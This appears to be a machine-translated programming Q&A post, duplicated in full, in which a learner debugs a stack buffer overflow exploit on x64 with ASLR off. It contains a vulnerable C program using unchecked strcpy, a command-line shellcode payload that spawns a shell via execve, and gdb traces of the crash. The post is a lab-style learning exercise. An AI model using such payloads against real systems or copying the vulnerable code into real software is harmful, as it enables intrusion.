在 x64 架构上执行推送指令时获取无法访问内存
Getting Cannot access memory on executing push instruction on x64 architecture
我正在尝试学习缓冲区溢出漏洞利用。 shell 代码包含指令,当单独执行时,它们 运行 没有任何问题,但是当控制权通过程序传递给它时,我试图利用它在推送指令处停止,给出 SEGSEGV 错误
我很难覆盖 return 地址。 ASLR 被禁用并且堆栈是可执行的。
这是我的程序:
#include<stdio.h>
#include<string.h>
void cllme()
{
printf("hello world\n");
}
int main(int argc, char *argv[]){
char buffer[30];
cllme();
printf("buffer is at %p\n",buffer);
printf("callme is at %p\n",cllme);
strcpy(buffer,argv[1]);
return 0;
}
这是我运行在gdb中执行的命令:
run $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+13*"a"+"\x10\xe4\xff\xff\xff\x7f"')
(gdb) x/13i $rip
=> 0x7fffffffe41c: neg rbx
0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
(gdb) i r
rax 0x0 0
rbx 0xff978cd091969dd1 -29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41c 0x7fffffffe41c
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
0x00007fffffffe41f in ?? ()
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/13i $rip
=> 0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x68732f6e69622f
(gdb)nexti
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe426 in ?? ()
谢谢 Jester 指出问题。事实证明,堆栈指针指向地址 e440,但当我们压入超过 20 个字节时,它弄乱了 shell 代码,导致它在创建一条试图访问 rbx location
的指令时崩溃]
(gdb) stepi
0x00007fffffffe424 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
0x7fffffffe42e: (bad)
0x7fffffffe42f: (bad)
0x7fffffffe430: add BYTE PTR [rax],al
(gdb) stepi
0x00007fffffffe425 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x38
0x7fffffffe429: in al,0xff
我正在尝试学习缓冲区溢出漏洞利用。 shell 代码包含指令,当单独执行时,它们 运行 没有任何问题,但是当控制权通过程序传递给它时,我试图利用它在推送指令处停止,给出 SEGSEGV 错误 我很难覆盖 return 地址。 ASLR 被禁用并且堆栈是可执行的。 这是我的程序:
#include<stdio.h>
#include<string.h>
void cllme()
{
printf("hello world\n");
}
int main(int argc, char *argv[]){
char buffer[30];
cllme();
printf("buffer is at %p\n",buffer);
printf("callme is at %p\n",cllme);
strcpy(buffer,argv[1]);
return 0;
}
这是我运行在gdb中执行的命令:
run $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+13*"a"+"\x10\xe4\xff\xff\xff\x7f"')
(gdb) x/13i $rip
=> 0x7fffffffe41c: neg rbx
0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
(gdb) i r
rax 0x0 0
rbx 0xff978cd091969dd1 -29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41c 0x7fffffffe41c
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
0x00007fffffffe41f in ?? ()
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/13i $rip
=> 0x7fffffffe41f: push rbx
0x7fffffffe420: push rsp
0x7fffffffe421: pop rdi
0x7fffffffe422: cdq
0x7fffffffe423: push rdx
0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
(gdb) i r
rax 0x0 0
rbx 0x68732f6e69622f 29400045130965551
rcx 0xe410616161616161 -2013001962561117855
rdx 0x7fffffffe41061 36028797017133153
rsi 0x7fffffffe7c0 140737488349120
rdi 0x7fffffffe432 140737488348210
rbp 0x6161616161616161 0x6161616161616161
rsp 0x7fffffffe440 0x7fffffffe440
r8 0x1 1
r9 0x1c 28
r10 0x78 120
r11 0x7ffff7b95f48 140737349508936
r12 0x5555555545f0 93824992232944
r13 0x7fffffffe510 140737488348432
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe41f 0x7fffffffe41f
eflags 0x213 [ CF AF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) nexti
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x68732f6e69622f
(gdb)nexti
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe426 in ?? ()
谢谢 Jester 指出问题。事实证明,堆栈指针指向地址 e440,但当我们压入超过 20 个字节时,它弄乱了 shell 代码,导致它在创建一条试图访问 rbx location
的指令时崩溃](gdb) stepi
0x00007fffffffe424 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe424: push rdi
0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x3b
0x7fffffffe429: syscall
0x7fffffffe42b: (bad)
0x7fffffffe42c: (bad)
0x7fffffffe42d: (bad)
0x7fffffffe42e: (bad)
0x7fffffffe42f: (bad)
0x7fffffffe430: add BYTE PTR [rax],al
(gdb) stepi
0x00007fffffffe425 in ?? ()
(gdb) x/11i $rip
=> 0x7fffffffe425: push rsp
0x7fffffffe426: pop rsi
0x7fffffffe427: mov al,0x38
0x7fffffffe429: in al,0xff